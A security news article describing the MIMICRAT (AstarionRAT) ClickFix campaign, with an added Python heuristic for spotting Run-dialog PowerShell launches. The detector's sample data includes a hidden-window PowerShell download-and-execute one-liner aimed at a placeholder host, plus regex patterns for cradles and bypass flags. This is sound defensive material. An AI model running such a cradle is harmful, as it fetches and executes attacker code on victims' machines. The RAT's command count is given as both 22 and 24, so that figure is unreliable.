
Cybersecurity researchers have revealed details of a new ClickFix campaign that exploits compromised legitimate sites to deliver a previously undocumented remote access Trojan (RAT) called MIMICRAT (also known as AstarionRAT).
“This campaign demonstrates a high level of operational sophistication, with compromised sites across multiple industries and geographies serving as the delivery infrastructure, a multi-stage PowerShell chain performing ETW and AMSI bypass before dropping a Lua-scripted shellcode loader, and the final implant communicating over HTTPS on port 443 using an HTTP profile similar to legitimate web analytics traffic,” Elastic Security Labs said in a Friday report.
According to the enterprise search and cybersecurity company, MIMICRAT is a custom C++ RAT that supports Windows token impersonation, SOCKS5 tunneling, and a set of 22 commands for comprehensive post-exploitation functionality. The campaign was discovered earlier this month.
There is also tactical and infrastructure overlap with another ClickFix campaign documented by Huntress, which led to the deployment of the Matanbuchus 3.0 loader, assessed to serve as a conduit for the same RAT. The ultimate goal of the attack is believed to be ransomware deployment or data leakage.
In the infection sequence highlighted by Elastic, the entry point was bincheck[.]io, a legitimate Bank Identification Number (BIN) verification service, which was compromised to inject malicious JavaScript that loaded an externally hosted PHP script. The PHP script then displays a fake Cloudflare verification page and delivers the ClickFix decoy by instructing the victim to copy and paste a command into the Windows Run dialog.
This runs a PowerShell command that connects to the command-and-control (C2) server to retrieve a second-stage PowerShell script, which patches Event Tracing for Windows (ETW) and the Antimalware Scan Interface (AMSI) before dropping the Lua-based loader. In the final stage, the Lua script is decrypted and the shellcode that serves MIMICRAT is executed in memory.
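The ClickFix step described above leaves a characteristic trace on the endpoint: a PowerShell process spawned from the Run dialog, whose parent is explorer.exe, with a command line that fetches and executes remote content. The following detection heuristic is an added example, not code from Elastic or from the report; the process-creation records are constructed in a Sysmon Event ID 1 style, and the indicator regexes and the scoring threshold are assumptions chosen for illustration rather than rules taken from the campaign.

```python
import re

# Constructed sample process-creation records (Sysmon Event ID 1 style).
# These are illustrative and are not events from the campaign in the article.
SAMPLE_EVENTS = [
    {   # Pasted into the Run dialog: parent is explorer.exe, download cradle piped to iex
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": 'powershell -w hidden -nop -c "iex (iwr https://example.invalid/stage2)"',
    },
    {   # Benign: a build tool running a local script, no cradle, not from explorer
        "ParentImage": r"C:\Program Files\Vendor\build.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell -File C:\build\package.ps1",
    },
    {   # Benign: not PowerShell at all
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\notepad.exe",
        "CommandLine": "notepad.exe notes.txt",
    },
]

# Command-line indicators commonly seen in pasted one-liners (assumed heuristics).
INDICATORS = [
    ("hidden-window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("no-profile", re.compile(r"-nop(?:rofile)?\b", re.I)),
    ("exec-policy-bypass", re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I)),
    ("download-cradle", re.compile(
        r"\b(?:iwr|invoke-webrequest|downloadstring|net\.webclient|curl)\b", re.I)),
    ("invoke-expression", re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    ("encoded-command", re.compile(
        r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
]


def score_event(event):
    """Return the indicator names that fire for one process-creation record.

    Only PowerShell processes are scored. An explorer.exe parent is recorded as
    its own indicator because the Run dialog is hosted by explorer.exe.
    """
    image = event.get("Image", "").lower()
    parent = event.get("ParentImage", "").lower()
    cmd = event.get("CommandLine", "")
    hits = []
    if not (image.endswith("powershell.exe") or image.endswith("pwsh.exe")):
        return hits
    if parent.endswith("\\explorer.exe"):
        hits.append("explorer-parent")
    for name, pattern in INDICATORS:
        if pattern.search(cmd):
            hits.append(name)
    return hits


def is_clickfix_like(event, min_hits=3):
    """Flag when PowerShell came from explorer.exe and enough indicators fired."""
    hits = score_event(event)
    return "explorer-parent" in hits and len(hits) >= min_hits


def scan(events):
    """Return (index, indicators) for every record that looks ClickFix-like."""
    return [(i, score_event(e)) for i, e in enumerate(events) if is_clickfix_like(e)]


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(hits)}")
```

The explorer.exe parent is the key discriminator here: ordinary administrative PowerShell is launched from a terminal, a scheduled task or a management agent, so requiring that parent together with a cradle keeps the rule quiet on the benign records while the pasted one-liner still fires on several indicators. Run-dialog history is also persisted in the user's RunMRU registry key, which gives the incident responder a second place to confirm what was pasted.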
The Trojan uses HTTPS to communicate with the C2 server and can accept 24 commands for process and file system control, interactive shell access, token manipulation, shellcode injection, and SOCKS proxy tunneling.
“The campaign supports 17 languages, and the lure content is dynamically localized based on the victim’s browser language settings, increasing its effective reach,” said security researcher Salim Bittam. “Identified victims span multiple geographies, including a U.S.-based university and multiple Chinese-speaking users documented in public forum discussions, suggesting widespread opportunistic targeting.”
